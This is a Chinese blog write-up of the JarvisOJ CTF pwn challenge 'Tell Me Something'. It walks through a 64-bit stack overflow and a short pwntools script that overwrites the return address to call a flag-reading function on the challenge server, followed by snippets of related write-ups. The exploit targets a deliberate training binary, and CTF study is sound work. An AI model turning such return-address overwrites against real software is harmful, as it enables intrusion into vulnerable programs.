jarvisoj pwn tell me something

最新推荐文章于 2023-04-17 15:54:55 发布
最新推荐文章于 2023-04-17 15:54:55 发布
阅读量153 收藏
点赞数
分类专栏: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43409582/article/details/100710633
版权
pwn 同时被 2 个专栏收录
15 篇文章 1 订阅
订阅专栏
ctf
12 篇文章 0 订阅
订阅专栏

先看保护:
在这里插入图片描述
只开了NX.
打开IDA
在这里插入图片描述明显的栈溢出漏洞,然后翻了翻其它函数,发现了一个叫good_game的函数很可疑。
在这里插入图片描述直接就有读flag的操作。
那么思路就很简单了,利用栈溢出将ret改为good_game的地址就ok了。
&v4距离$ebp是0x88所以直接覆盖0x88个字符就行了后接good_game的地址
exp.py:

from pwn import *
p = remote('pwn.jarvisoj.com',9876)

pay = "a"*0x88+ p64(0x0400620)
p.sendline(pay)
p.interactive()
ch3nwr1d
关注
专栏目录
jarvisoj pwn tell me something
Joey_l的博客
07-31 200
题目链接 https://www.jarvisoj.com/challenges 下载程序后,先file查看到文件为64位、动态链接 file guestbook 接着用checksec命令查看文件开启了哪些保护机制 checksec guestbook 用ida64打开程序,观察到main中的read函数存在溢出点,shift+F12可以看到有flag.txt文件,猜想程序中可能...
JarvisOJ PWN Tell me Something wp
苗_的博客
01-09 179
Tell me Something 先拖进ida里看一下,发现了"flag.txt"字符串,双击发现good_game函数: 查看主函数,发现其中并没有调用goodgame函数: 所以我们输入大于buffer长度的数据,溢出的数据将会覆盖栈上的数据,因此我们将main的返回地址改成goodgame的地址,这样当main函数执行完之后,将会跳转到goodgame函数上进行执行,从而拿到...
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 562
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
jarvisoj_tell_me_something
m0sway的博客
11-23 448
jarvisoj_tell_me_something 使用checksec查看: 看来又是一道栈溢出的题目,直接放IDA查看: 一眼看过去,main()函数中就已经存在栈溢出了 查看字符串可以发现,存在一个flag.txt的字符串,跟进函数查看: 这个函数读取并打印了flag,so…我们只需要return到这个函数即可 需要注意的是: 函数起始的时候并没有将rbp压入栈中,结束的时候也没有leave 所以我们在ret的时候不需要加上偏移,直接在0x88后面加上要ret的函数的地址 exp: from
jarvisoj_tell_me_something【BUUCTF】
qq_41696518的博客
09-03 197
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置。
[BUUCTF]PWN——jarvisoj_tell_me_something
BangSen1的博客
03-18 773
jarvisoj_tell_me_something 例行检查,开启NX保护,64bit 运行一下 用IDA打开,看到了关键函数 flag.txt.跟进一下。 flag_addr=0x400620 看一下主函数。 输入点的v4溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag。 汇编结尾没有leave 起步刚开始就直接是rsp减去0x88,这里是没有把rbp压入栈,所以只需要0x88的数据大小,就可以覆盖返回地址了 from pwn import * r=remote('nod
BUUCTF pwn——jarvisoj_tell_me_something
CNS-Enterprise BCC-1701-J
04-17 179
BUUCTF 做题练习
18.9.19 Jarvis OJ PWN----Tell Me Something
qq_42192672的博客
09-19 200
我先checksec一下 可以栈溢出,发现主函数里的read函数就可以溢出 我们可以看到函数列表里还有个函数叫good_game 那直接覆盖然会地址就好啦 上脚本 #函数主体 cn.recvuntil("Input your message:\n") goodgame_addr=0x00400620 payload='a'*(0x88)+p64(goodgame_addr...
Jarvis Oj Pwn 学习笔记-Tell Me Something
weixin_34005042的博客
05-31 89
记一个64位栈帧的坑!!! 老板儿,链接要得: https://files.cnblogs.com/files/Magpie/guestbook.rar nc pwn.jarvisoj.com 9876 第n次checksec...: 宣IDA觐见: good_name一看就很妖孽,于是跟进去: 好嘛~搞定了这不! 看一下main函数的溢出点: 于是payload...
Jarvis OJ pwn wp - Tell Me Something + Smashes
fa1c4的blog
07-03 136
Tell Me Something 栈溢出, ret2text, 白给题, 但是要注意这里的调用约定不是标准的, 所以偏移量就是0x88, 不需要加8 add rsp, 0x88之后就ret了, 所以偏移为0x88, 不是根据IDA反编译的结果来判断 from pwn import * from pwnlib.util.cyclic import cyclic context(arch = 'amd64', os = 'linux', log_level = 'debug') sel = 1 fi
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 1004
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1972
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 255
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn刷题
清霂的博客
03-26 252
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 545
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
栈迁移浅析
qq_43409582的博客
11-23 4054
0x00 线下有道栈迁移的题目,因为当时没有好好学,对于栈迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先栈迁移就是因为可写空间太小不够rop,就把栈迁移到别的地方去构造payload。 而栈迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解栈迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持栈指针
off by null 小结
qq_43409582的博客
11-20 3378
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
OGEEK2019 babyrop wp
qq_43409582的博客
03-19 2215
这题就是需要绕过两个验证,之后就是常规rop了。 这里有个比较,你输入的值与一个随机数进行比较,这个验证不过会直接推出程序。那我们就让他取一个极值,让他无论是何值都能过。因为strlen这个函数遇到’\0’就会截止。所以我们就输入‘\x00’就好了。这样不论随机数是什么我们都会取<0。 这个地方的取值是之前那个函数的返回值,利用之前那个输入的地方把v5盖成一个很大的值以便之后做栈溢出的rop...
HITCON-training lab10 wp
qq_43409582的博客
01-30 1674
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值